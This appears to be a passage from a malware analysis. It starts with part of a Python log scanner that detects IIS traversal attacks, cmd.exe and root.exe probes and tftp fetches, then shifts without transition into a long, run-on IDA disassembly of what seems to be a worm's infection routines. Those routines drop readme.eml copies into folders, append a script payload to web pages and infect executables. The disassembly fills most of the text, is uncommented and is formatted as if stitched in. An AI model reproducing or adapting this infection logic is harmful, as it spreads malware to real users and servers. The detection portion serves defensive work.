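    out, i = bytearray(), 0
    while i < len(data):
        if (data[i] == 0x25 and i + 2 < len(data)
                and data[i + 1] in HEX_DIGITS and data[i + 2] in HEX_DIGITS):
            out.append(int(data[i + 1:i + 3], 16))
            i += 3
        else:
            out.append(data[i])
            i += 1
    return bytes(out)


def fold_overlong_utf8(data: bytes) -> bytes:
    """Mimic the lenient decoder behind the unicode traversal bug (Bugtraq ID 1806):
    a 0xC0/0xC1 lead byte and the byte after it collapse into one ASCII character
    with no check that the second byte is a real continuation byte. That maps
    %c0%af -> '/', %c1%9c -> '\\' and also the malformed %c0%2f and %c1%1c."""
    out, i = bytearray(), 0
    while i < len(data):
        if data[i] in (0xC0, 0xC1) and i + 1 < len(data):
            out.append(((data[i] & 0x1F) << 6) | (data[i + 1] & 0x3F))
            i += 2
        else:
            out.append(data[i])
            i += 1
    return bytes(out)


def normalize_path(raw: str, max_rounds: int = 3):
    """Decode the way a lenient IIS would and return (path, rounds). rounds > 1
    means the request depended on double encoding (the %255c escaped-chars bug)."""
    data, rounds = raw.encode("latin-1", "replace"), 0
    for _ in range(max_rounds):
        decoded = fold_overlong_utf8(percent_decode_once(data))
        if decoded == data:
            break
        data, rounds = decoded, rounds + 1
    return data.decode("latin-1").replace("\\", "/"), rounds


def escapes_web_root(path: str) -> bool:
    """True if the '..' segments ever climb above the directory the path starts in."""
    depth = 0
    for seg in path.split("/"):
        if seg == "..":
            depth -= 1
            if depth < 0:
                return True
        elif seg and seg != ".":
            depth += 1
    return False


def worm_counts_as_success(status: str) -> bool:
    """sub_361732F5 reads reply bytes 9..11 (right after 'HTTP/1.x ') and accepts
    only "200" or "502"; IIS typically answers 502 when a CGI (here cmd.exe) ran
    but sent no headers, so either code tells the worm its command executed."""
    return status in ("200", "502")


def analyse_request(target: str, status: str) -> dict:
    path, _, query = target.partition("?")
    decoded, rounds = normalize_path(path)
    reasons = []
    if escapes_web_root(decoded):
        reasons.append("traversal above web root")
    if rounds > 1:
        reasons.append("double URL encoding")
    for name in PAYLOAD_NAMES:
        if decoded.lower().endswith("/" + name):
            reasons.append("request for " + name)
    if "tftp" in normalize_path(query)[0].lower():
        reasons.append("tftp fetch in command")
    executed = bool(reasons) and worm_counts_as_success(status)
    return {"decoded_path": decoded, "reasons": reasons, "executed": executed}


def scan_log(lines) -> list:
    """One finding per suspicious request, in log order; 'executed' marks replies
    the worm itself would have taken as proof that the command ran."""
    findings = []
    for line in lines:
        m = LOG_RE.search(line)
        if not m:
            continue
        info = analyse_request(m.group("target"), m.group("status"))
        if info["reasons"]:
            info["line"] = line
            findings.append(info)
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG.splitlines()):
        print("EXECUTED" if f["executed"] else "probe   ", f["decoded_path"], f["reasons"])
```

Requests flagged with "executed" (a 200 or 502 reply to a cmd.exe or root.exe probe) are the hosts to treat as compromised rather than merely scanned.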
3617339F sub_3617339F proc near ; CODE XREF: sub_36173325+66p 3617339F ; sub_3617339F+107p 3617339F 3617339F var_164 = dword ptr -164h 3617339F var_150 = dword ptr -150h 3617339F var_14C = byte ptr -14Ch 3617339F var_124 = byte ptr -124h 3617339F var_120 = byte ptr -120h 3617339F var_8 = dword ptr -8 3617339F arg_0 = dword ptr 4 3617339F 3617339F sub esp, 144h 361733A5 push ebx 361733A6 mov ebx, [esp+148h+arg_0] 361733AD push esi 361733AE push edi 361733AF push ebx 361733B0 call sub_361735F9 361733B5 cmp eax, 4 361733B8 pop ecx 361733B9 jg short loc_361733D5 361733BB mov edi, 400h 361733C0 push edi 361733C1 push 8 361733C3 push dword_3617ACB4 361733C9 call dword_3617AC74 361733CF mov esi, eax 361733D1 test esi, esi 361733D3 jnz short loc_361733DC 361733D5 361733D5 loc_361733D5: ; CODE XREF: sub_3617339F+1Aj 361733D5 xor eax, eax 361733D7 jmp loc_361735EF 361733DC ; ─────────────────────────────────────────────────────────────────────────── 361733DC 361733DC loc_361733DC: ; CODE XREF: sub_3617339F+34j 361733DC push edi 361733DD push ebx 361733DE push esi 361733DF call ds:strncpy 361733E5 push esi 361733E6 call sub_3617186E 361733EB push ebx 361733EC call _strlen 361733F1 mov ebx, ds:strncat 361733F7 mov ecx, edi 361733F9 sub ecx, eax 361733FB push ecx 361733FC push offset a_ ; "\\*.*" 36173401 push esi 36173402 call ebx ; strncat 36173404 add esp, 20h 36173407 lea eax, [esp+15Ch+var_14C] 3617340B push eax 3617340C push esi 3617340D call ds:FindFirstFileA 36173413 cmp eax, 0FFFFFFFFh 36173416 mov [esp+15Ch+var_150], eax 3617341A jnz short loc_36173423 3617341C xor edi, edi 3617341E jmp loc_361735DE 36173423 ; ─────────────────────────────────────────────────────────────────────────── 36173423 36173423 loc_36173423: ; CODE XREF: sub_3617339F+7Bj 36173423 lea eax, [esp+15Ch+var_120] 36173427 push ebp 36173428 push eax 36173429 call ds:_strlwr 3617342F lea eax, [esp+164h+var_120] 36173433 mov [esp+164h+var_164], offset dot ; "." 
3617343A push eax 3617343B call _strcmp 36173440 mov ebp, ds:strstr 36173446 pop ecx 36173447 pop ecx 36173448 test eax, eax 3617344A 3617344A loc_3617344A: ; CODE XREF: sub_3617339F+22Cj 3617344A jz loc_36173598 36173450 lea eax, [esp+160h+var_120] 36173454 push offset a__ ; ".." 36173459 push eax 3617345A call _strcmp 3617345F pop ecx 36173460 test eax, eax 36173462 pop ecx 36173463 jz loc_36173598 36173469 test [esp+160h+var_14C], 10h 3617346E jz short loc_361734B3 36173470 push edi 36173471 push [esp+164h+var_8] 36173478 push esi 36173479 call ds:strncpy 3617347F push esi 36173480 call _strlen 36173485 mov ecx, edi 36173487 sub ecx, eax 36173489 push ecx 3617348A push offset asc_36179474 ; "\\" 3617348F push esi 36173490 call ebx ; strncat 36173492 push esi 36173493 call _strlen 36173498 mov ecx, edi 3617349A sub ecx, eax 3617349C lea eax, [esp+180h+var_120] 361734A0 push ecx 361734A1 push eax 361734A2 push esi 361734A3 call ebx ; strncat 361734A5 push esi 361734A6 call sub_3617339F 361734AB add esp, 30h 361734AE jmp loc_36173598 361734B3 ; ─────────────────────────────────────────────────────────────────────────── 361734B3 361734B3 loc_361734B3: ; CODE XREF: sub_3617339F+CFj 361734B3 lea eax, [esp+160h+var_120] 361734B7 push eax 361734B8 call _strlen 361734BD cmp eax, 4 361734C0 pop ecx 361734C1 jbe loc_36173598 361734C7 lea eax, [esp+160h+var_120] 361734CB push offset dot_htm ; ".htm" 361734D0 push eax 361734D1 call _strlen 361734D6 pop ecx 361734D7 lea eax, [esp+eax+164h+var_124] 361734DB push eax 361734DC call _strcmp 361734E1 pop ecx 361734E2 test eax, eax 361734E4 pop ecx 361734E5 jz short loc_36173527 361734E7 lea eax, [esp+160h+var_120] 361734EB push offset asp_ext ; ".asp" 361734F0 push eax 361734F1 call _strlen 361734F6 pop ecx 361734F7 lea eax, [esp+eax+164h+var_124] 361734FB push eax 361734FC call _strcmp 36173501 pop ecx 36173502 test eax, eax 36173504 pop ecx 36173505 jz short loc_36173527 36173507 lea eax, [esp+160h+var_120] 3617350B push offset 
html_ext ; "html" 36173510 push eax 36173511 call _strlen 36173516 pop ecx 36173517 lea eax, [esp+eax+164h+var_124] 3617351B push eax 3617351C call _strcmp 36173521 pop ecx 36173522 test eax, eax 36173524 pop ecx 36173525 jnz short loc_36173598 36173527 36173527 loc_36173527: ; CODE XREF: sub_3617339F+146j 36173527 ; sub_3617339F+166j 36173527 lea eax, [esp+160h+var_120] 3617352B push offset default ; "default" 36173530 push eax 36173531 call ebp ; strstr 36173533 pop ecx 36173534 test eax, eax 36173536 pop ecx 36173537 jnz short loc_36173585 36173539 lea eax, [esp+160h+var_120] 3617353D push offset index ; "index" 36173542 push eax 36173543 call ebp ; strstr 36173545 pop ecx 36173546 test eax, eax 36173548 pop ecx 36173549 jnz short loc_36173585 3617354B lea eax, [esp+160h+var_120] 3617354F push offset main ; "main" 36173554 push eax 36173555 call ebp ; strstr 36173557 pop ecx 36173558 test eax, eax 3617355A pop ecx 3617355B jnz short loc_36173585 3617355D lea eax, [esp+160h+var_120] 36173561 push offset readme ; "readme" 36173566 push eax 36173567 call ebp ; strstr 36173569 pop ecx 3617356A test eax, eax 3617356C pop ecx 3617356D jnz short loc_36173585 3617356F call ds:rand 36173575 imul eax, 64h 36173578 cdq 36173579 mov ecx, 7FFFh 3617357E idiv ecx 36173580 cmp eax, 62h 36173583 jle short loc_36173598 36173585 36173585 loc_36173585: ; CODE XREF: sub_3617339F+198j 36173585 ; sub_3617339F+1AAj ... 36173585 lea eax, [esp+160h+var_120] 36173589 push eax 3617358A push [esp+164h+var_8] 36173591 call sub_36173618 36173596 pop ecx 36173597 pop ecx 36173598 36173598 loc_36173598: ; CODE XREF: sub_3617339F+ABj 36173598 ; sub_3617339F+C4j ... 
36173598 lea eax, [esp+160h+var_14C] 3617359C push eax 3617359D push [esp+164h+var_150] 361735A1 call ds:FindNextFileA 361735A7 test eax, eax 361735A9 jz short loc_361735D0 361735AB lea eax, [esp+160h+var_120] 361735AF push eax 361735B0 call ds:_strlwr 361735B6 lea eax, [esp+164h+var_120] 361735BA mov [esp+164h+var_164], offset dot ; "." 361735C1 push eax 361735C2 call _strcmp 361735C7 pop ecx 361735C8 pop ecx 361735C9 test eax, eax 361735CB jmp loc_3617344A 361735D0 ; ─────────────────────────────────────────────────────────────────────────── 361735D0 361735D0 loc_361735D0: ; CODE XREF: sub_3617339F+20Aj 361735D0 push [esp+160h+var_150] 361735D4 call ds:FindClose 361735DA push 1 361735DC pop edi 361735DD pop ebp 361735DE 361735DE loc_361735DE: ; CODE XREF: sub_3617339F+7Fj 361735DE push esi 361735DF push 0 361735E1 push dword_3617ACB4 361735E7 call dword_3617AC70 361735ED mov eax, edi 361735EF 361735EF loc_361735EF: ; CODE XREF: sub_3617339F+38j 361735EF pop edi 361735F0 pop esi 361735F1 pop ebx 361735F2 add esp, 144h 361735F8 retn 361735F8 sub_3617339F endp ; sp = -18h 361735F8 361735F9 361735F9 ; ███████████████ S U B R O U T I N E ███████████████████████████████████████ 361735F9 361735F9 361735F9 sub_361735F9 proc near ; CODE XREF: sub_3617339F+11p 361735F9 361735F9 arg_0 = dword ptr 4 361735F9 361735F9 mov ecx, [esp+arg_0] 361735FD xor eax, eax 361735FF test ecx, ecx 36173601 jnz short loc_36173604 36173603 36173603 locret_36173603: ; CODE XREF: sub_361735F9+11j 36173603 retn 36173604 ; ─────────────────────────────────────────────────────────────────────────── 36173604 36173604 loc_36173604: ; CODE XREF: sub_361735F9+8j 36173604 mov edx, ecx 36173606 mov cl, [ecx] 36173608 36173608 loc_36173608: ; CODE XREF: sub_361735F9+1Dj 36173608 test cl, cl 3617360A jz short locret_36173603 3617360C cmp cl, 5Ch 3617360F jnz short loc_36173612 36173611 inc eax 36173612 36173612 loc_36173612: ; CODE XREF: sub_361735F9+16j 36173612 mov cl, [edx+1] 36173615 inc edx 36173616 
jmp short loc_36173608 36173616 sub_361735F9 endp 36173616 36173618 36173618 ; ███████████████ S U B R O U T I N E ███████████████████████████████████████ 36173618 36173618 ; Attributes: bp-based frame 36173618 36173618 sub_36173618 proc near ; CODE XREF: sub_3617339F+1F2p 36173618 36173618 var_28 = byte ptr -28h 36173618 var_F = byte ptr -0Fh 36173618 var_8 = dword ptr -8 36173618 var_4 = dword ptr -4 36173618 arg_0 = dword ptr 8 36173618 arg_4 = dword ptr 0Ch 36173618 36173618 push ebp 36173619 mov ebp, esp 3617361B sub esp, 28h 3617361E push esi 3617361F and [ebp+var_8], 0 36173623 mov esi, 400h 36173628 push edi 36173629 push esi 3617362A push 8 3617362C push dword_3617ACB4 36173632 call dword_3617AC74 36173638 mov edi, eax 3617363A test edi, edi 3617363C mov [ebp+var_4], edi 3617363F jz loc_361737C5 36173645 push ebx 36173646 mov ebx, ds:strncpy 3617364C push esi 3617364D push [ebp+arg_0] 36173650 push edi 36173651 call ebx ; strncpy 36173653 push edi 36173654 call sub_3617186E 36173659 push [ebp+arg_0] 3617365C call _strlen 36173661 mov ecx, esi 36173663 sub ecx, eax 36173665 push ecx 36173666 push offset bs_readme_eml ; "\\readme.eml" 3617366B push edi 3617366C mov edi, ds:strncat 36173672 call edi ; strncat 36173674 add esp, 20h 36173677 push 0 36173679 push [ebp+var_4] 3617367C push offset byte_3617C8B8 36173681 call ds:CopyFileA 36173687 push esi 36173688 push [ebp+arg_0] 3617368B push [ebp+var_4] 3617368E call ebx ; strncpy 36173690 mov ebx, [ebp+var_4] 36173693 push ebx 36173694 call sub_3617186E 36173699 push [ebp+arg_0] 3617369C call _strlen 361736A1 sub esi, eax 361736A3 push esi 361736A4 push offset asc_36179474 ; "\\" 361736A9 push ebx 361736AA call edi ; strncat 361736AC push [ebp+arg_0] 361736AF call _strlen 361736B4 mov ecx, 3FFh 361736B9 sub ecx, eax 361736BB push ecx 361736BC push [ebp+arg_4] 361736BF push ebx 361736C0 call edi ; strncat 361736C2 add esp, 30h 361736C5 push 80h 361736CA push ebx 361736CB call ds:SetFileAttributesA 361736D1 xor 
esi, esi 361736D3 push esi 361736D4 push esi 361736D5 push 3 361736D7 push esi 361736D8 push 3 361736DA push 0C0000000h 361736DF push ebx 361736E0 call ds:CreateFileA 361736E6 mov edi, eax 361736E8 cmp edi, 0FFFFFFFFh 361736EB mov [ebp+arg_0], edi 361736EE jnz short loc_361736F7 361736F0 xor edi, edi 361736F2 jmp loc_361737B2 361736F7 ; ─────────────────────────────────────────────────────────────────────────── 361736F7 361736F7 loc_361736F7: ; CODE XREF: sub_36173618+D6j 361736F7 push esi 361736F8 push edi 361736F9 call ds:GetFileSize 361736FF cmp eax, 0FFFFFFFFh 36173702 jz loc_361737A7 36173708 cmp eax, 800000h 3617370D ja loc_361737A7 36173713 cmp eax, 19h 36173716 jb loc_361737A7 3617371C mov ebx, ds:SetFilePointer 36173722 push 2 36173724 push esi 36173725 push 0FFFFFFE7h 36173727 push edi 36173728 call ebx ; SetFilePointer 3617372A cmp eax, 0FFFFFFFFh 3617372D jz short loc_361737A7 3617372F lea eax, [ebp+var_8] 36173732 push esi 36173733 push eax 36173734 lea eax, [ebp+var_28] 36173737 push 19h 36173739 push eax 3617373A push [ebp+arg_0] 3617373D call ds:ReadFile 36173743 test eax, eax 36173745 jz short loc_361737A7 36173747 and [ebp+var_F], 0 3617374B lea eax, [ebp+var_28] 3617374E push eax 3617374F call ds:_strlwr 36173755 mov edi, offset JS_window ; "\r\n<html><script language=\"JavaScript\">w"... 
3617375A push edi 3617375B call _strlen 36173760 mov ecx, edi 36173762 sub ecx, 19h 36173765 add eax, ecx 36173767 push eax 36173768 lea eax, [ebp+var_28] 3617376B push eax 3617376C call _strcmp 36173771 add esp, 10h 36173774 test eax, eax 36173776 jnz short loc_3617377D 36173778 36173778 loc_36173778: ; CODE XREF: sub_36173618+18Dj 36173778 push 1 3617377A pop edi 3617377B jmp short loc_361737A9 3617377D ; ─────────────────────────────────────────────────────────────────────────── 3617377D 3617377D loc_3617377D: ; CODE XREF: sub_36173618+15Ej 3617377D push 2 3617377F push esi 36173780 push esi 36173781 push [ebp+arg_0] 36173784 call ebx ; SetFilePointer 36173786 cmp eax, 0FFFFFFFFh 36173789 jz short loc_361737A7 3617378B lea eax, [ebp+var_8] 3617378E push esi 3617378F push eax 36173790 push edi 36173791 mov [ebp+var_8], esi 36173794 call _strlen 36173799 pop ecx 3617379A push eax 3617379B push edi 3617379C push [ebp+arg_0] 3617379F call ds:WriteFile 361737A5 jmp short loc_36173778 361737A7 ; ─────────────────────────────────────────────────────────────────────────── 361737A7 361737A7 loc_361737A7: ; CODE XREF: sub_36173618+EAj 361737A7 ; sub_36173618+F5j ... 
361737A7 xor edi, edi 361737A9 361737A9 loc_361737A9: ; CODE XREF: sub_36173618+163j 361737A9 push [ebp+arg_0] 361737AC call ds:CloseHandle 361737B2 361737B2 loc_361737B2: ; CODE XREF: sub_36173618+DAj 361737B2 push [ebp+var_4] 361737B5 push esi 361737B6 push dword_3617ACB4 361737BC call dword_3617AC70 361737C2 mov eax, edi 361737C4 pop ebx 361737C5 361737C5 loc_361737C5: ; CODE XREF: sub_36173618+27j 361737C5 pop edi 361737C6 pop esi 361737C7 leave 361737C8 retn 361737C8 sub_36173618 endp 361737C8 361737C9 361737C9 ; ███████████████ S U B R O U T I N E ███████████████████████████████████████ 361737C9 361737C9 ; Attributes: bp-based frame 361737C9 361737C9 sub_361737C9 proc near ; CODE XREF: sub_36171F05+89p 361737C9 361737C9 var_40 = byte ptr -40h 361737C9 361737C9 push ebp 361737CA mov ebp, esp 361737CC sub esp, 40h 361737CF push ebx 361737D0 push esi 361737D1 push edi 361737D2 lea eax, [ebp+var_40] 361737D5 push 40h 361737D7 push eax 361737D8 xor edi, edi 361737DA xor ebx, ebx 361737DC call dword_3617AC1C 361737E2 lea eax, [ebp+var_40] 361737E5 push eax 361737E6 call dword_3617AC20 361737EC mov esi, eax 361737EE mov eax, [esi+0Ch] 361737F1 cmp [eax], edi 361737F3 jz short loc_36173801 361737F5 361737F5 loc_361737F5: ; CODE XREF: sub_361737C9+32j 361737F5 add eax, 4 361737F8 inc ebx 361737F9 cmp [eax], edi 361737FB jnz short loc_361737F5 361737FD cmp ebx, edi 361737FF jnz short loc_36173844 36173801 36173801 loc_36173801: ; CODE XREF: sub_361737C9+2Aj 36173801 mov dword_3617D658, 1 3617380B 3617380B loc_3617380B: ; CODE XREF: sub_361737C9+9Bj 3617380B ; sub_361737C9+9Fj 3617380B push dword_3617D654 36173811 call dword_3617AC24 36173817 push 13h 36173819 push eax 3617381A push offset byte_3617D640 3617381F call ds:strncpy 36173825 add esp, 0Ch 36173828 push edi 36173829 push edi 3617382A push edi 3617382B call ds:CreateMutexA 36173831 xor ecx, ecx 36173833 cmp eax, edi 36173835 setnz cl 36173838 pop edi 36173839 mov dword_3617D65C, eax 3617383E pop esi 3617383F 
mov eax, ecx 36173841 pop ebx 36173842 leave 36173843 retn 36173844 ; ─────────────────────────────────────────────────────────────────────────── 36173844 36173844 loc_36173844: ; CODE XREF: sub_361737C9+36j 36173844 mov dword_3617D658, edi 3617384A call ds:rand 36173850 imul eax, ebx 36173853 cdq 36173854 mov ecx, 7FFFh 36173859 idiv ecx 3617385B mov edx, [esi+0Ch] 3617385E xor ebx, ebx 36173860 36173860 loc_36173860: ; CODE XREF: sub_361737C9+ADj 36173860 mov ecx, [edx] 36173862 cmp ecx, edi 36173864 jz short loc_3617380B 36173866 cmp ebx, eax 36173868 jg short loc_3617380B 3617386A mov ecx, [ecx] 3617386C add edx, 4 3617386F mov dword_3617D654, ecx 36173875 inc ebx 36173876 jmp short loc_36173860 36173876 sub_361737C9 endp 36173876 36173878 36173878 ; ███████████████ S U B R O U T I N E ███████████████████████████████████████ 36173878 36173878 36173878 sub_36173878 proc near ; CODE XREF: sub_36173DCF+194p 36173878 ; sub_36174E10+CDp 36173878 36173878 var_44C = dword ptr -44Ch 36173878 var_448 = dword ptr -448h 36173878 var_444 = dword ptr -444h 36173878 var_440 = dword ptr -440h 36173878 var_43C = dword ptr -43Ch 36173878 var_438 = dword ptr -438h 36173878 var_434 = dword ptr -434h 36173878 var_430 = dword ptr -430h 36173878 var_42C = dword ptr -42Ch 36173878 var_428 = dword ptr -428h 36173878 var_424 = byte ptr -424h 36173878 var_420 = byte ptr -420h 36173878 var_418 = byte ptr -418h 36173878 var_410 = byte ptr -410h 36173878 var_40C = byte ptr -40Ch 36173878 var_408 = byte ptr -408h 36173878 var_400 = byte ptr -400h 36173878 var_14 = dword ptr -14h 36173878 arg_0 = dword ptr 4 36173878 36173878 sub esp, 44Ch 3617387E push ebx 3617387F push ebp 36173880 mov ebp, [esp+454h+arg_0] 36173887 push esi 36173888 push edi 36173889 xor edi, edi 3617388B push ebp 3617388C mov [esp+460h+var_430], edi 36173890 mov [esp+460h+var_434], edi 36173894 mov [esp+460h+var_44C], 2E8h 3617389C mov [esp+460h+var_43C], edi 361738A0 xor ebx, ebx 361738A2 mov [esp+460h+var_444], edi 
361738A6 mov [esp+460h+var_440], edi 361738AA mov [esp+460h+var_448], edi 361738AE call _strlen 361738B3 cmp eax, 0Ch 361738B6 pop ecx 361738B7 jl loc_36173D07 361738BD lea eax, [eax+ebp-0Ch] 361738C1 push offset WINZIP32_EXE ; "winzip32.exe" 361738C6 push eax 361738C7 call _strcmp 361738CC pop ecx 361738CD test eax, eax 361738CF pop ecx 361738D0 jz loc_36173D07 361738D6 push edi 361738D7 push edi 361738D8 push 3 361738DA push edi 361738DB push 1 361738DD push 0C0000000h 361738E2 push ebp 361738E3 call ds:CreateFileA 361738E9 mov esi, eax 361738EB cmp esi, 0FFFFFFFFh 361738EE jz loc_36173D07 361738F4 push edi 361738F5 push esi 361738F6 call ds:GetFileSize 361738FC cmp eax, 800000h 36173901 jbe short loc_3617390F 36173903 36173903 loc_36173903: ; CODE XREF: sub_36173878+A8j 36173903 ; sub_36173878+C0j 36173903 push esi 36173904 36173904 loc_36173904: ; CODE XREF: sub_36173878+C8j 36173904 ; sub_36173878+406j 36173904 call ds:CloseHandle 3617390A jmp loc_36173D07 3617390F ; ─────────────────────────────────────────────────────────────────────────── 3617390F 3617390F loc_3617390F: ; CODE XREF: sub_36173878+89j 3617390F push edi 36173910 push edi 36173911 push 0D7h 36173916 push esi 36173917 call ds:SetFilePointer 3617391D cmp eax, 0FFFFFFFFh 36173920 jz short loc_36173903 36173922 lea eax, [esp+45Ch+var_424] 36173926 push edi 36173927 push eax 36173928 lea eax, [esp+464h+var_420] 3617392C push 1 3617392E push eax 3617392F push esi 36173930 call ds:ReadFile 36173936 test eax, eax 36173938 jz short loc_36173903 3617393A cmp [esp+45Ch+var_420], 7Fh 3617393F push esi 36173940 jz short loc_36173904 36173942 call ds:CloseHandle 36173948 lea eax, [esp+45Ch+var_400] 3617394C push eax 3617394D push edi 3617394E push offset mep ; "mep" 36173953 push offset byte_3617B4B8 36173958 call ds:GetTempFileNameA 3617395E test eax, eax 36173960 jz loc_36173D07 36173966 lea eax, [esp+45Ch+var_400] 3617396A push eax 3617396B call ds:DeleteFileA 36173971 lea eax, [esp+45Ch+var_400] 36173975 
push offset dot_exe ; ".exe" 3617397A push eax 3617397B call _strcat 36173980 pop ecx 36173981 lea eax, [esp+460h+var_400] 36173985 pop ecx 36173986 push edi 36173987 push eax 36173988 push offset byte_3617C0B8 3617398D call ds:CopyFileA 36173993 test eax, eax 36173995 jz loc_36173D07 3617399B lea eax, [esp+45Ch+var_400] 3617399F push 80h 361739A4 push eax 361739A5 call ds:SetFileAttributesA 361739AB push 2 361739AD push edi 361739AE push ebp 361739AF call ds:LoadLibraryExA 361739B5 mov esi, eax 361739B7 cmp esi, edi 361739B9 mov [esp+45Ch+var_438], esi 361739BD jz loc_36173DB7 361739C3 lea eax, [esp+45Ch+var_400] 361739C7 push edi 361739C8 push eax 361739C9 call ds:BeginUpdateResourceA 361739CF mov ebp, eax 361739D1 xor edi, edi 361739D3 cmp ebp, edi 361739D5 mov [esp+45Ch+var_428], ebp 361739D9 jnz short loc_361739E7 361739DB push esi 361739DC call ds:FreeLibrary 361739E2 jmp loc_36173DB7 361739E7 ; ─────────────────────────────────────────────────────────────────────────── 361739E7 361739E7 loc_361739E7: ; CODE XREF: sub_36173878+161j 361739E7 mov [esp+45Ch+var_42C], edi 361739EB 361739EB loc_361739EB: ; CODE XREF: sub_36173878+266j 361739EB movzx eax, word ptr [esp+45Ch+var_42C] 361739F0 push 3 361739F2 push eax 361739F3 push [esp+464h+var_438] 361739F7 call ds:FindResourceA 361739FD mov esi, eax 361739FF test esi, esi 36173A01 jz loc_36173AD2 36173A07 push esi 36173A08 push [esp+460h+var_438] 36173A0C call ds:LoadResource 36173A12 test eax, eax 36173A14 jz loc_36173AD2 36173A1A push eax 36173A1B call ds:LockResource 36173A21 mov edi, eax 36173A23 test edi, edi 36173A25 jz loc_36173AD2 36173A2B push esi 36173A2C push [esp+460h+var_438] 36173A30 call ds:SizeofResource 36173A36 test eax, eax 36173A38 jz loc_36173AD2 36173A3E mov ecx, 128h 36173A43 cmp eax, ecx 36173A45 jnz short loc_36173A58 36173A47 cmp [esp+45Ch+var_43C], 0 36173A4C jnz loc_36173AD2 36173A52 mov [esp+45Ch+var_43C], edi 36173A56 jmp short loc_36173AD2 36173A58 ; 
─────────────────────────────────────────────────────────────────────────── 36173A58 36173A58 loc_36173A58: ; CODE XREF: sub_36173878+1CDj 36173A58 cmp eax, 2E8h 36173A5D jnz short loc_36173A67 36173A5F test ebx, ebx 36173A61 jnz short loc_36173AD2 36173A63 mov ebx, edi 36173A65 jmp short loc_36173AD2 36173A67 ; ─────────────────────────────────────────────────────────────────────────── 36173A67 36173A67 loc_36173A67: ; CODE XREF: sub_36173878+1E5j 36173A67 cmp eax, 8A8h 36173A6C jnz short loc_36173A7B 36173A6E cmp [esp+45Ch+var_444], 0 36173A73 jnz short loc_36173AD2 36173A75 mov [esp+45Ch+var_444], edi 36173A79 jmp short loc_36173AD2 36173A7B ; ─────────────────────────────────────────────────────────────────────────── 36173A7B 36173A7B loc_36173A7B: ; CODE XREF: sub_36173878+1F4j 36173A7B cmp eax, 0EA8h 36173A80 jnz short loc_36173A8F 36173A82 cmp [esp+45Ch+var_440], 0 36173A87 jnz short loc_36173AD2 36173A89 mov [esp+45Ch+var_440], edi 36173A8D jmp short loc_36173AD2 36173A8F ; ─────────────────────────────────────────────────────────────────────────── 36173A8F 36173A8F loc_36173A8F: ; CODE XREF: sub_36173878+208j 36173A8F cmp eax, 130h 36173A94 jnz short loc_36173AA3 36173A96 cmp [esp+45Ch+var_448], 0 36173A9B jnz short loc_36173AD2 36173A9D mov [esp+45Ch+var_448], edi 36173AA1 jmp short loc_36173AD2 36173AA3 ; ─────────────────────────────────────────────────────────────────────────── 36173AA3 36173AA3 loc_36173AA3: ; CODE XREF: sub_36173878+21Cj 36173AA3 cmp [esp+45Ch+var_430], 0 36173AA8 jnz short loc_36173AB2 36173AAA mov [esp+45Ch+var_430], edi 36173AAE mov [esp+45Ch+var_434], eax 36173AB2 36173AB2 loc_36173AB2: ; CODE XREF: sub_36173878+230j 36173AB2 test ebx, ebx 36173AB4 jz short loc_36173AD2 36173AB6 cmp [esp+45Ch+var_43C], 0 36173ABB jz short loc_36173AD2 36173ABD cmp [esp+45Ch+var_444], 0 36173AC2 jz short loc_36173AD2 36173AC4 cmp [esp+45Ch+var_440], 0 36173AC9 jz short loc_36173AD2 36173ACB cmp [esp+45Ch+var_448], 0 36173AD0 jnz short loc_36173AE9 
36173AD2 36173AD2 loc_36173AD2: ; CODE XREF: sub_36173878+189j 36173AD2 ; sub_36173878+19Cj ... 36173AD2 inc [esp+45Ch+var_42C] 36173AD6 cmp [esp+45Ch+var_42C], 80h 36173ADE jl loc_361739EB 36173AE4 mov ecx, 128h 36173AE9 36173AE9 loc_36173AE9: ; CODE XREF: sub_36173878+258j 36173AE9 xor edx, edx 36173AEB cmp [esp+45Ch+var_430], edx 36173AEF jnz short loc_36173B2D 36173AF1 cmp ebx, edx 36173AF3 jnz loc_36173B85 36173AF9 mov eax, [esp+45Ch+var_43C] 36173AFD cmp eax, edx 36173AFF jnz short loc_36173B3F 36173B01 cmp [esp+45Ch+var_444], edx 36173B05 jnz short loc_36173B3F 36173B07 cmp [esp+45Ch+var_440], edx 36173B0B jnz short loc_36173B45 36173B0D cmp [esp+45Ch+var_448], edx 36173B11 jnz short loc_36173B79 36173B13 lea eax, [esp+45Ch+var_400] 36173B17 push eax 36173B18 call ds:DeleteFileA 36173B1E push [esp+45Ch+var_438] 36173B22 call ds:FreeLibrary 36173B28 jmp loc_36173D07 36173B2D ; ─────────────────────────────────────────────────────────────────────────── 36173B2D 36173B2D loc_36173B2D: ; CODE XREF: sub_36173878+277j 36173B2D cmp ebx, edx 36173B2F jnz short loc_36173B85 36173B31 mov eax, [esp+45Ch+var_434] 36173B35 mov ebx, [esp+45Ch+var_430] 36173B39 mov [esp+45Ch+var_44C], eax 36173B3D jmp short loc_36173B85 36173B3F ; ─────────────────────────────────────────────────────────────────────────── 36173B3F 36173B3F loc_36173B3F: ; CODE XREF: sub_36173878+287j 36173B3F ; sub_36173878+28Dj 36173B3F cmp [esp+45Ch+var_440], edx 36173B43 jz short loc_36173B53 36173B45 36173B45 loc_36173B45: ; CODE XREF: sub_36173878+293j 36173B45 mov ebx, [esp+45Ch+var_440] 36173B49 mov [esp+45Ch+var_44C], 0EA8h 36173B51 jmp short loc_36173B85 36173B53 ; ─────────────────────────────────────────────────────────────────────────── 36173B53 36173B53 loc_36173B53: ; CODE XREF: sub_36173878+2CBj 36173B53 cmp [esp+45Ch+var_444], edx 36173B57 jz short loc_36173B67 36173B59 mov ebx, [esp+45Ch+var_444] 36173B5D mov [esp+45Ch+var_44C], 8A8h 36173B65 jmp short loc_36173B85 36173B67 ; 
